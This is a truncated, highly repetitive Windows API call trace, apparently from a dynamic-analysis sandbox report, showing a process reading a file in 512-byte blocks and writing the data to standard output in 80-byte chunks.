[0127.251] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] GetFileType (hFile=0x50) returned 0x1 [0127.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.252] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.252] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) 
returned 1 [0127.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.252] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.254] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.254] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.255] GetFileType (hFile=0x50) returned 0x1 [0127.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.255] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, 
lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.256] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.257] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.258] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.258] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, 
lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.260] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.260] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, 
lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.261] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.261] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 
[0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.262] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.262] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: 
